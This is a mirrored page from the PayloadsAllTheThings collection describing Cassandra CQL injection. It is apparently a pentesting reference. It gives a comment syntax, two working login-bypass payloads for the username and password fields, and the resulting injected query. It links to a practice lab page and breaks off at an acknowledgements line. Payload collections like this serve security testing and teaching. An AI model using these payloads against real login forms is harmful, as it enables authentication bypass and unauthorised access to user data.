1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-08-28 04:41:32 +02:00
PayloadsAllTheThings/SQL injection/Cassandra Injection.md
2018-09-10 20:40:43 +02:00

793 B
Raw Permalink Blame History

Cassandra Injection

Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system

Cassandra comment

/* Cassandra Comment */

Cassandra - Login Bypass

Login Bypass 0

username: admin' ALLOW FILTERING; %00
password: ANY

Login Bypass 1

username: admin'/*
password: */and pass>'

The injection would look like the following SQL query

SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;

Example from EternalNoob : https://hack2learn.pw/cassandra/login.php

Thanks to